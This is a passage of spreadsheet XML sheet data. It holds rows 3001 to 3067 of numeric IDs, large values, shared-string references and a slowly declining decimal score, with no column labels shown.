    <row r="3001" ht="15.75" customHeight="1">
      <c r="A3001" s="1">
        <v>32612.0</v>
      </c>
      <c r="B3001" s="2">
        <v>5827355.0</v>
      </c>
      <c r="C3001" s="2" t="s">
        <v>2809</v>
      </c>
      <c r="D3001" s="2">
        <v>1.0</v>
      </c>
      <c r="E3001" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3001" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="3002" ht="15.75" customHeight="1">
      <c r="A3002" s="1">
        <v>15255.0</v>
      </c>
      <c r="B3002" s="2">
        <v>4.2299966E7</v>
      </c>
      <c r="C3002" s="2" t="s">
        <v>2810</v>
      </c>
      <c r="D3002" s="2">
        <v>1.0</v>
      </c>
      <c r="E3002" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3002" s="2">
        <v>0.1358974358974359</v>
      </c>
    </row>
    <row r="3003" ht="15.75" customHeight="1">
      <c r="A3003" s="1">
        <v>17452.0</v>
      </c>
      <c r="B3003" s="2">
        <v>4.9813655E7</v>
      </c>
      <c r="C3003" s="2" t="s">
        <v>2811</v>
      </c>
      <c r="D3003" s="2">
        <v>1.0</v>
      </c>
      <c r="E3003" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3003" s="2">
        <v>0.1358974358974359</v>
      </c>
    </row>
    <row r="3004" ht="15.75" customHeight="1">
      <c r="A3004" s="1">
        <v>1499.0</v>
      </c>
      <c r="B3004" s="2">
        <v>2.7242894E7</v>
      </c>
      <c r="C3004" s="2" t="s">
        <v>2812</v>
      </c>
      <c r="D3004" s="2">
        <v>1.0</v>
      </c>
      <c r="E3004" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3004" s="2">
        <v>0.1355218855218855</v>
      </c>
    </row>
    <row r="3005" ht="15.75" customHeight="1">
      <c r="A3005" s="1">
        <v>16224.0</v>
      </c>
      <c r="B3005" s="2">
        <v>4.5713E7</v>
      </c>
      <c r="C3005" s="2" t="s">
        <v>2813</v>
      </c>
      <c r="D3005" s="2">
        <v>1.0</v>
      </c>
      <c r="E3005" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3005" s="2">
        <v>0.135477582846004</v>
      </c>
    </row>
    <row r="3006" ht="15.75" customHeight="1">
      <c r="A3006" s="1">
        <v>2594.0</v>
      </c>
      <c r="B3006" s="2">
        <v>3.4362906E7</v>
      </c>
      <c r="C3006" s="2" t="s">
        <v>2814</v>
      </c>
      <c r="D3006" s="2">
        <v>1.0</v>
      </c>
      <c r="E3006" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3006" s="2">
        <v>0.1354775828460039</v>
      </c>
    </row>
    <row r="3007" ht="15.75" customHeight="1">
      <c r="A3007" s="1">
        <v>7086.0</v>
      </c>
      <c r="B3007" s="2">
        <v>5.0287459E7</v>
      </c>
      <c r="C3007" s="2" t="s">
        <v>2815</v>
      </c>
      <c r="D3007" s="2">
        <v>1.0</v>
      </c>
      <c r="E3007" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3007" s="2">
        <v>0.1354775828460039</v>
      </c>
    </row>
    <row r="3008" ht="15.75" customHeight="1">
      <c r="A3008" s="1">
        <v>9941.0</v>
      </c>
      <c r="B3008" s="2">
        <v>5.6864499E7</v>
      </c>
      <c r="C3008" s="2" t="s">
        <v>2816</v>
      </c>
      <c r="D3008" s="2">
        <v>1.0</v>
      </c>
      <c r="E3008" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3008" s="2">
        <v>0.1354775828460039</v>
      </c>
    </row>
    <row r="3009" ht="15.75" customHeight="1">
      <c r="A3009" s="1">
        <v>16512.0</v>
      </c>
      <c r="B3009" s="2">
        <v>4.6612488E7</v>
      </c>
      <c r="C3009" s="2" t="s">
        <v>2817</v>
      </c>
      <c r="D3009" s="2">
        <v>1.0</v>
      </c>
      <c r="E3009" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3009" s="2">
        <v>0.1353046594982079</v>
      </c>
    </row>
    <row r="3010" ht="15.75" customHeight="1">
      <c r="A3010" s="1">
        <v>17.0</v>
      </c>
      <c r="B3010" s="2">
        <v>1.0327582E7</v>
      </c>
      <c r="C3010" s="2" t="s">
        <v>2818</v>
      </c>
      <c r="D3010" s="2">
        <v>1.0</v>
      </c>
      <c r="E3010" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3010" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="3011" ht="15.75" customHeight="1">
      <c r="A3011" s="1">
        <v>1749.0</v>
      </c>
      <c r="B3011" s="2">
        <v>2.8844847E7</v>
      </c>
      <c r="C3011" s="2" t="s">
        <v>2819</v>
      </c>
      <c r="D3011" s="2">
        <v>1.0</v>
      </c>
      <c r="E3011" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3011" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="3012" ht="15.75" customHeight="1">
      <c r="A3012" s="1">
        <v>4445.0</v>
      </c>
      <c r="B3012" s="2">
        <v>4.2399409E7</v>
      </c>
      <c r="C3012" s="2" t="s">
        <v>2820</v>
      </c>
      <c r="D3012" s="2">
        <v>1.0</v>
      </c>
      <c r="E3012" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3012" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="3013" ht="15.75" customHeight="1">
      <c r="A3013" s="1">
        <v>5682.0</v>
      </c>
      <c r="B3013" s="2">
        <v>4.6403167E7</v>
      </c>
      <c r="C3013" s="2" t="s">
        <v>2821</v>
      </c>
      <c r="D3013" s="2">
        <v>1.0</v>
      </c>
      <c r="E3013" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3013" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="3014" ht="15.75" customHeight="1">
      <c r="A3014" s="1">
        <v>7671.0</v>
      </c>
      <c r="B3014" s="2">
        <v>5.1895633E7</v>
      </c>
      <c r="C3014" s="2" t="s">
        <v>2822</v>
      </c>
      <c r="D3014" s="2">
        <v>1.0</v>
      </c>
      <c r="E3014" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3014" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="3015" ht="15.75" customHeight="1">
      <c r="A3015" s="1">
        <v>8078.0</v>
      </c>
      <c r="B3015" s="2">
        <v>5.3011591E7</v>
      </c>
      <c r="C3015" s="2" t="s">
        <v>2823</v>
      </c>
      <c r="D3015" s="2">
        <v>1.0</v>
      </c>
      <c r="E3015" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3015" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="3016" ht="15.75" customHeight="1">
      <c r="A3016" s="1">
        <v>16496.0</v>
      </c>
      <c r="B3016" s="2">
        <v>4.6556573E7</v>
      </c>
      <c r="C3016" s="2" t="s">
        <v>2824</v>
      </c>
      <c r="D3016" s="2">
        <v>1.0</v>
      </c>
      <c r="E3016" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3016" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="3017" ht="15.75" customHeight="1">
      <c r="A3017" s="1">
        <v>7031.0</v>
      </c>
      <c r="B3017" s="2">
        <v>5.0128642E7</v>
      </c>
      <c r="C3017" s="2" t="s">
        <v>2825</v>
      </c>
      <c r="D3017" s="2">
        <v>1.0</v>
      </c>
      <c r="E3017" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3017" s="2">
        <v>0.1350574712643678</v>
      </c>
    </row>
    <row r="3018" ht="15.75" customHeight="1">
      <c r="A3018" s="1">
        <v>10855.0</v>
      </c>
      <c r="B3018" s="2">
        <v>1.6264089E7</v>
      </c>
      <c r="C3018" s="2" t="s">
        <v>2826</v>
      </c>
      <c r="D3018" s="2">
        <v>1.0</v>
      </c>
      <c r="E3018" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3018" s="2">
        <v>0.1350574712643678</v>
      </c>
    </row>
    <row r="3019" ht="15.75" customHeight="1">
      <c r="A3019" s="1">
        <v>12256.0</v>
      </c>
      <c r="B3019" s="2">
        <v>2.7980312E7</v>
      </c>
      <c r="C3019" s="2" t="s">
        <v>2827</v>
      </c>
      <c r="D3019" s="2">
        <v>1.0</v>
      </c>
      <c r="E3019" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3019" s="2">
        <v>0.1350574712643678</v>
      </c>
    </row>
    <row r="3020" ht="15.75" customHeight="1">
      <c r="A3020" s="1">
        <v>17288.0</v>
      </c>
      <c r="B3020" s="2">
        <v>4.9218078E7</v>
      </c>
      <c r="C3020" s="2" t="s">
        <v>2828</v>
      </c>
      <c r="D3020" s="2">
        <v>1.0</v>
      </c>
      <c r="E3020" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3020" s="2">
        <v>0.1350574712643678</v>
      </c>
    </row>
    <row r="3021" ht="15.75" customHeight="1">
      <c r="A3021" s="1">
        <v>18564.0</v>
      </c>
      <c r="B3021" s="2">
        <v>5.3190261E7</v>
      </c>
      <c r="C3021" s="2" t="s">
        <v>2829</v>
      </c>
      <c r="D3021" s="2">
        <v>1.0</v>
      </c>
      <c r="E3021" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3021" s="2">
        <v>0.1350574712643678</v>
      </c>
    </row>
    <row r="3022" ht="15.75" customHeight="1">
      <c r="A3022" s="1">
        <v>513.0</v>
      </c>
      <c r="B3022" s="2">
        <v>1.8178995E7</v>
      </c>
      <c r="C3022" s="2" t="s">
        <v>2830</v>
      </c>
      <c r="D3022" s="2">
        <v>1.0</v>
      </c>
      <c r="E3022" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3022" s="2">
        <v>0.1348039215686275</v>
      </c>
    </row>
    <row r="3023" ht="15.75" customHeight="1">
      <c r="A3023" s="1">
        <v>16.0</v>
      </c>
      <c r="B3023" s="2">
        <v>1.0327582E7</v>
      </c>
      <c r="C3023" s="2" t="s">
        <v>2831</v>
      </c>
      <c r="D3023" s="2">
        <v>1.0</v>
      </c>
      <c r="E3023" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3023" s="2">
        <v>0.1347736625514403</v>
      </c>
    </row>
    <row r="3024" ht="15.75" customHeight="1">
      <c r="A3024" s="1">
        <v>3388.0</v>
      </c>
      <c r="B3024" s="2">
        <v>3.7958762E7</v>
      </c>
      <c r="C3024" s="2" t="s">
        <v>2832</v>
      </c>
      <c r="D3024" s="2">
        <v>1.0</v>
      </c>
      <c r="E3024" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3024" s="2">
        <v>0.1346516007532957</v>
      </c>
    </row>
    <row r="3025" ht="15.75" customHeight="1">
      <c r="A3025" s="1">
        <v>4743.0</v>
      </c>
      <c r="B3025" s="2">
        <v>4.3371958E7</v>
      </c>
      <c r="C3025" s="2" t="s">
        <v>2833</v>
      </c>
      <c r="D3025" s="2">
        <v>1.0</v>
      </c>
      <c r="E3025" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3025" s="2">
        <v>0.1346516007532957</v>
      </c>
    </row>
    <row r="3026" ht="15.75" customHeight="1">
      <c r="A3026" s="1">
        <v>28967.0</v>
      </c>
      <c r="B3026" s="2">
        <v>2.9812644E7</v>
      </c>
      <c r="C3026" s="2" t="s">
        <v>2834</v>
      </c>
      <c r="D3026" s="2">
        <v>1.0</v>
      </c>
      <c r="E3026" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3026" s="2">
        <v>0.1346516007532957</v>
      </c>
    </row>
    <row r="3027" ht="15.75" customHeight="1">
      <c r="A3027" s="1">
        <v>10243.0</v>
      </c>
      <c r="B3027" s="2">
        <v>5.7535705E7</v>
      </c>
      <c r="C3027" s="2" t="s">
        <v>2835</v>
      </c>
      <c r="D3027" s="2">
        <v>1.0</v>
      </c>
      <c r="E3027" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3027" s="2">
        <v>0.1345486111111112</v>
      </c>
    </row>
    <row r="3028" ht="15.75" customHeight="1">
      <c r="A3028" s="1">
        <v>1684.0</v>
      </c>
      <c r="B3028" s="2">
        <v>2.8427512E7</v>
      </c>
      <c r="C3028" s="2" t="s">
        <v>2836</v>
      </c>
      <c r="D3028" s="2">
        <v>1.0</v>
      </c>
      <c r="E3028" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3028" s="2">
        <v>0.1345486111111111</v>
      </c>
    </row>
    <row r="3029" ht="15.75" customHeight="1">
      <c r="A3029" s="1">
        <v>19701.0</v>
      </c>
      <c r="B3029" s="2">
        <v>5.6500716E7</v>
      </c>
      <c r="C3029" s="2" t="s">
        <v>2837</v>
      </c>
      <c r="D3029" s="2">
        <v>1.0</v>
      </c>
      <c r="E3029" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3029" s="2">
        <v>0.1343434343434344</v>
      </c>
    </row>
    <row r="3030" ht="15.75" customHeight="1">
      <c r="A3030" s="1">
        <v>7050.0</v>
      </c>
      <c r="B3030" s="2">
        <v>5.0183333E7</v>
      </c>
      <c r="C3030" s="2" t="s">
        <v>2838</v>
      </c>
      <c r="D3030" s="2">
        <v>1.0</v>
      </c>
      <c r="E3030" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3030" s="2">
        <v>0.1342592592592593</v>
      </c>
    </row>
    <row r="3031" ht="15.75" customHeight="1">
      <c r="A3031" s="1">
        <v>9851.0</v>
      </c>
      <c r="B3031" s="2">
        <v>5.6696428E7</v>
      </c>
      <c r="C3031" s="2" t="s">
        <v>2839</v>
      </c>
      <c r="D3031" s="2">
        <v>1.0</v>
      </c>
      <c r="E3031" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3031" s="2">
        <v>0.1342592592592593</v>
      </c>
    </row>
    <row r="3032" ht="15.75" customHeight="1">
      <c r="A3032" s="1">
        <v>30397.0</v>
      </c>
      <c r="B3032" s="2">
        <v>3.8697142E7</v>
      </c>
      <c r="C3032" s="2" t="s">
        <v>2840</v>
      </c>
      <c r="D3032" s="2">
        <v>1.0</v>
      </c>
      <c r="E3032" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3032" s="2">
        <v>0.1342592592592593</v>
      </c>
    </row>
    <row r="3033" ht="15.75" customHeight="1">
      <c r="A3033" s="1">
        <v>13532.0</v>
      </c>
      <c r="B3033" s="2">
        <v>3.5597671E7</v>
      </c>
      <c r="C3033" s="2" t="s">
        <v>2841</v>
      </c>
      <c r="D3033" s="2">
        <v>1.0</v>
      </c>
      <c r="E3033" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3033" s="2">
        <v>0.1341880341880342</v>
      </c>
    </row>
    <row r="3034" ht="15.75" customHeight="1">
      <c r="A3034" s="1">
        <v>34226.0</v>
      </c>
      <c r="B3034" s="2">
        <v>4.5154269E7</v>
      </c>
      <c r="C3034" s="2" t="s">
        <v>2842</v>
      </c>
      <c r="D3034" s="2">
        <v>1.0</v>
      </c>
      <c r="E3034" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3034" s="2">
        <v>0.1341880341880342</v>
      </c>
    </row>
    <row r="3035" ht="15.75" customHeight="1">
      <c r="A3035" s="1">
        <v>11227.0</v>
      </c>
      <c r="B3035" s="2">
        <v>2.03171E7</v>
      </c>
      <c r="C3035" s="2" t="s">
        <v>2843</v>
      </c>
      <c r="D3035" s="2">
        <v>1.0</v>
      </c>
      <c r="E3035" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3035" s="2">
        <v>0.1339285714285715</v>
      </c>
    </row>
    <row r="3036" ht="15.75" customHeight="1">
      <c r="A3036" s="1">
        <v>20018.0</v>
      </c>
      <c r="B3036" s="2">
        <v>5978216.0</v>
      </c>
      <c r="C3036" s="2" t="s">
        <v>2844</v>
      </c>
      <c r="D3036" s="2">
        <v>1.0</v>
      </c>
      <c r="E3036" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3036" s="2">
        <v>0.1339285714285715</v>
      </c>
    </row>
    <row r="3037" ht="15.75" customHeight="1">
      <c r="A3037" s="1">
        <v>385.0</v>
      </c>
      <c r="B3037" s="2">
        <v>1.6389289E7</v>
      </c>
      <c r="C3037" s="2" t="s">
        <v>2845</v>
      </c>
      <c r="D3037" s="2">
        <v>1.0</v>
      </c>
      <c r="E3037" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3037" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="3038" ht="15.75" customHeight="1">
      <c r="A3038" s="1">
        <v>6316.0</v>
      </c>
      <c r="B3038" s="2">
        <v>4.8247004E7</v>
      </c>
      <c r="C3038" s="2" t="s">
        <v>2846</v>
      </c>
      <c r="D3038" s="2">
        <v>1.0</v>
      </c>
      <c r="E3038" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3038" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="3039" ht="15.75" customHeight="1">
      <c r="A3039" s="1">
        <v>6472.0</v>
      </c>
      <c r="B3039" s="2">
        <v>4.8664005E7</v>
      </c>
      <c r="C3039" s="2" t="s">
        <v>2847</v>
      </c>
      <c r="D3039" s="2">
        <v>1.0</v>
      </c>
      <c r="E3039" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3039" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="3040" ht="15.75" customHeight="1">
      <c r="A3040" s="1">
        <v>15688.0</v>
      </c>
      <c r="B3040" s="2">
        <v>4.3870869E7</v>
      </c>
      <c r="C3040" s="2" t="s">
        <v>2848</v>
      </c>
      <c r="D3040" s="2">
        <v>1.0</v>
      </c>
      <c r="E3040" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3040" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="3041" ht="15.75" customHeight="1">
      <c r="A3041" s="1">
        <v>15836.0</v>
      </c>
      <c r="B3041" s="2">
        <v>4.4354998E7</v>
      </c>
      <c r="C3041" s="2" t="s">
        <v>2849</v>
      </c>
      <c r="D3041" s="2">
        <v>1.0</v>
      </c>
      <c r="E3041" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3041" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="3042" ht="15.75" customHeight="1">
      <c r="A3042" s="1">
        <v>31046.0</v>
      </c>
      <c r="B3042" s="2">
        <v>4.7926309E7</v>
      </c>
      <c r="C3042" s="2" t="s">
        <v>2850</v>
      </c>
      <c r="D3042" s="2">
        <v>1.0</v>
      </c>
      <c r="E3042" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3042" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="3043" ht="15.75" customHeight="1">
      <c r="A3043" s="1">
        <v>33465.0</v>
      </c>
      <c r="B3043" s="2">
        <v>7953197.0</v>
      </c>
      <c r="C3043" s="2" t="s">
        <v>2851</v>
      </c>
      <c r="D3043" s="2">
        <v>1.0</v>
      </c>
      <c r="E3043" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3043" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="3044" ht="15.75" customHeight="1">
      <c r="A3044" s="1">
        <v>5301.0</v>
      </c>
      <c r="B3044" s="2">
        <v>4.524549E7</v>
      </c>
      <c r="C3044" s="2" t="s">
        <v>2852</v>
      </c>
      <c r="D3044" s="2">
        <v>1.0</v>
      </c>
      <c r="E3044" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3044" s="2">
        <v>0.1335282651072125</v>
      </c>
    </row>
    <row r="3045" ht="15.75" customHeight="1">
      <c r="A3045" s="1">
        <v>6387.0</v>
      </c>
      <c r="B3045" s="2">
        <v>4.84403E7</v>
      </c>
      <c r="C3045" s="2" t="s">
        <v>2853</v>
      </c>
      <c r="D3045" s="2">
        <v>1.0</v>
      </c>
      <c r="E3045" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3045" s="2">
        <v>0.1335282651072125</v>
      </c>
    </row>
    <row r="3046" ht="15.75" customHeight="1">
      <c r="A3046" s="1">
        <v>7406.0</v>
      </c>
      <c r="B3046" s="2">
        <v>5.1111368E7</v>
      </c>
      <c r="C3046" s="2" t="s">
        <v>2854</v>
      </c>
      <c r="D3046" s="2">
        <v>1.0</v>
      </c>
      <c r="E3046" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3046" s="2">
        <v>0.1335282651072125</v>
      </c>
    </row>
    <row r="3047" ht="15.75" customHeight="1">
      <c r="A3047" s="1">
        <v>3070.0</v>
      </c>
      <c r="B3047" s="2">
        <v>3.6520369E7</v>
      </c>
      <c r="C3047" s="2" t="s">
        <v>2855</v>
      </c>
      <c r="D3047" s="2">
        <v>1.0</v>
      </c>
      <c r="E3047" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3047" s="2">
        <v>0.1335125448028674</v>
      </c>
    </row>
    <row r="3048" ht="15.75" customHeight="1">
      <c r="A3048" s="1">
        <v>16106.0</v>
      </c>
      <c r="B3048" s="2">
        <v>4.5399235E7</v>
      </c>
      <c r="C3048" s="2" t="s">
        <v>2856</v>
      </c>
      <c r="D3048" s="2">
        <v>1.0</v>
      </c>
      <c r="E3048" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3048" s="2">
        <v>0.1334688346883469</v>
      </c>
    </row>
    <row r="3049" ht="15.75" customHeight="1">
      <c r="A3049" s="1">
        <v>11050.0</v>
      </c>
      <c r="B3049" s="2">
        <v>1.81641E7</v>
      </c>
      <c r="C3049" s="2" t="s">
        <v>2857</v>
      </c>
      <c r="D3049" s="2">
        <v>1.0</v>
      </c>
      <c r="E3049" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3049" s="2">
        <v>0.1331569664902999</v>
      </c>
    </row>
    <row r="3050" ht="15.75" customHeight="1">
      <c r="A3050" s="1">
        <v>3791.0</v>
      </c>
      <c r="B3050" s="2">
        <v>3.9952885E7</v>
      </c>
      <c r="C3050" s="2" t="s">
        <v>2858</v>
      </c>
      <c r="D3050" s="2">
        <v>1.0</v>
      </c>
      <c r="E3050" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3050" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="3051" ht="15.75" customHeight="1">
      <c r="A3051" s="1">
        <v>5814.0</v>
      </c>
      <c r="B3051" s="2">
        <v>4.6834743E7</v>
      </c>
      <c r="C3051" s="2" t="s">
        <v>2859</v>
      </c>
      <c r="D3051" s="2">
        <v>1.0</v>
      </c>
      <c r="E3051" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3051" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="3052" ht="15.75" customHeight="1">
      <c r="A3052" s="1">
        <v>6824.0</v>
      </c>
      <c r="B3052" s="2">
        <v>4.9582983E7</v>
      </c>
      <c r="C3052" s="2" t="s">
        <v>2860</v>
      </c>
      <c r="D3052" s="2">
        <v>1.0</v>
      </c>
      <c r="E3052" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3052" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="3053" ht="15.75" customHeight="1">
      <c r="A3053" s="1">
        <v>10128.0</v>
      </c>
      <c r="B3053" s="2">
        <v>5.7285074E7</v>
      </c>
      <c r="C3053" s="2" t="s">
        <v>2861</v>
      </c>
      <c r="D3053" s="2">
        <v>1.0</v>
      </c>
      <c r="E3053" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3053" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="3054" ht="15.75" customHeight="1">
      <c r="A3054" s="1">
        <v>12699.0</v>
      </c>
      <c r="B3054" s="2">
        <v>3.0791145E7</v>
      </c>
      <c r="C3054" s="2" t="s">
        <v>2862</v>
      </c>
      <c r="D3054" s="2">
        <v>1.0</v>
      </c>
      <c r="E3054" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3054" s="2">
        <v>0.1328502415458938</v>
      </c>
    </row>
    <row r="3055" ht="15.75" customHeight="1">
      <c r="A3055" s="1">
        <v>15880.0</v>
      </c>
      <c r="B3055" s="2">
        <v>4.4514569E7</v>
      </c>
      <c r="C3055" s="2" t="s">
        <v>2863</v>
      </c>
      <c r="D3055" s="2">
        <v>1.0</v>
      </c>
      <c r="E3055" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3055" s="2">
        <v>0.1328502415458938</v>
      </c>
    </row>
    <row r="3056" ht="15.75" customHeight="1">
      <c r="A3056" s="1">
        <v>4379.0</v>
      </c>
      <c r="B3056" s="2">
        <v>4.2155749E7</v>
      </c>
      <c r="C3056" s="2" t="s">
        <v>2864</v>
      </c>
      <c r="D3056" s="2">
        <v>1.0</v>
      </c>
      <c r="E3056" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3056" s="2">
        <v>0.1328125000000001</v>
      </c>
    </row>
    <row r="3057" ht="15.75" customHeight="1">
      <c r="A3057" s="1">
        <v>4711.0</v>
      </c>
      <c r="B3057" s="2">
        <v>4.3269294E7</v>
      </c>
      <c r="C3057" s="2" t="s">
        <v>2865</v>
      </c>
      <c r="D3057" s="2">
        <v>1.0</v>
      </c>
      <c r="E3057" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3057" s="2">
        <v>0.1328125000000001</v>
      </c>
    </row>
    <row r="3058" ht="15.75" customHeight="1">
      <c r="A3058" s="1">
        <v>3725.0</v>
      </c>
      <c r="B3058" s="2">
        <v>3.9613235E7</v>
      </c>
      <c r="C3058" s="2" t="s">
        <v>2866</v>
      </c>
      <c r="D3058" s="2">
        <v>1.0</v>
      </c>
      <c r="E3058" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3058" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="3059" ht="15.75" customHeight="1">
      <c r="A3059" s="1">
        <v>9992.0</v>
      </c>
      <c r="B3059" s="2">
        <v>5.6981779E7</v>
      </c>
      <c r="C3059" s="2" t="s">
        <v>2867</v>
      </c>
      <c r="D3059" s="2">
        <v>1.0</v>
      </c>
      <c r="E3059" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3059" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="3060" ht="15.75" customHeight="1">
      <c r="A3060" s="1">
        <v>11532.0</v>
      </c>
      <c r="B3060" s="2">
        <v>2.2544971E7</v>
      </c>
      <c r="C3060" s="2" t="s">
        <v>2868</v>
      </c>
      <c r="D3060" s="2">
        <v>1.0</v>
      </c>
      <c r="E3060" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3060" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="3061" ht="15.75" customHeight="1">
      <c r="A3061" s="1">
        <v>13572.0</v>
      </c>
      <c r="B3061" s="2">
        <v>3.5728209E7</v>
      </c>
      <c r="C3061" s="2" t="s">
        <v>2869</v>
      </c>
      <c r="D3061" s="2">
        <v>1.0</v>
      </c>
      <c r="E3061" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3061" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="3062" ht="15.75" customHeight="1">
      <c r="A3062" s="1">
        <v>15774.0</v>
      </c>
      <c r="B3062" s="2">
        <v>4.4184276E7</v>
      </c>
      <c r="C3062" s="2" t="s">
        <v>2870</v>
      </c>
      <c r="D3062" s="2">
        <v>1.0</v>
      </c>
      <c r="E3062" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3062" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="3063" ht="15.75" customHeight="1">
      <c r="A3063" s="1">
        <v>15784.0</v>
      </c>
      <c r="B3063" s="2">
        <v>4.4199813E7</v>
      </c>
      <c r="C3063" s="2" t="s">
        <v>2871</v>
      </c>
      <c r="D3063" s="2">
        <v>1.0</v>
      </c>
      <c r="E3063" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3063" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="3064" ht="15.75" customHeight="1">
      <c r="A3064" s="1">
        <v>17482.0</v>
      </c>
      <c r="B3064" s="2">
        <v>4.9952696E7</v>
      </c>
      <c r="C3064" s="2" t="s">
        <v>2872</v>
      </c>
      <c r="D3064" s="2">
        <v>1.0</v>
      </c>
      <c r="E3064" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3064" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="3065" ht="15.75" customHeight="1">
      <c r="A3065" s="1">
        <v>852.0</v>
      </c>
      <c r="B3065" s="2">
        <v>2.1716426E7</v>
      </c>
      <c r="C3065" s="2" t="s">
        <v>2873</v>
      </c>
      <c r="D3065" s="2">
        <v>1.0</v>
      </c>
      <c r="E3065" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3065" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="3066" ht="15.75" customHeight="1">
      <c r="A3066" s="1">
        <v>1033.0</v>
      </c>
      <c r="B3066" s="2">
        <v>2.3211947E7</v>
      </c>
      <c r="C3066" s="2" t="s">
        <v>2874</v>
      </c>
      <c r="D3066" s="2">
        <v>1.0</v>
      </c>
      <c r="E3066" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3066" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="3067" ht="15.75" customHeight="1">
      <c r="A3067" s="1">
        <v>1035.0</v>
      </c>
      <c r="B3067" s="2">
        <v>2.3235134E7</v>
      </c>
      <c r="C3067" s="2" t="s">
        <v>2875</v>
      </c>
      <c r="D3067" s="2">
        <v>1.0</v>
      </c>
      <c r="E3067" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3067" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
